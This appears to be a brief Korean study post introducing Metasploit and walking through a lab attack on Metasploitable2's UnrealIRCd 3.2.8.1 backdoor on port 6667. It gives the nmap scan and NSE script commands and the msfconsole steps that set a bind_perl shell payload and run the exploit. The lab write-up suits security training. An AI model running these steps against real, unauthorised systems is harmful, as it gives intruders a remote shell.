Metasploit
Metasploit
: 가장 유명한 Exploit 도구
- H.D.Moore가 Perl Script로 만들었는데 Rapid7에서 인수해서 Ruby로 재구조화 (공격모듈 확장자 .rb)
- 무료 버전을 배포하겠다고 약속 (metasploit-framework : 무료, metasploit-pro : 유료)
- Windows, Linux 버전 등 제공 (공격 모듈을 악성코드로 인식하기 때문에 Windows에서 설치하면 동작이 잘 안됨)
Exploit 단계
버전 스캔, ALL 스캔
스크립트를 통해 취약점 확인
구글 검색 확인
Metasploit 공격
metasploitable2 실습
위의 단계를 따라
우분투 서버에 다양한 어플리케이션의 가장 취약한 버전을 설치한 metasploitable2의 6667번 포트 실습
sudo nmap -A 192.168.61.131 -p 6667
: 취약서버 6667번 포트 ALL 스캔
-> version: Unreal3.2.8.1
/usr/share/nmap/scripts 에서 취약점 다시 진단
sudo find . -name "unreal"
-> ./irc-unrealircd-backdoor.nse
sudo nmap --script=irc-unrealircd-backdoor.nse 192.168.61.131 -p 6667
구글 검색 : https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/
sudo msfconsole
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
탈취 성공!
선영이가 시켜서 대충 갈기는 어리바리 포스트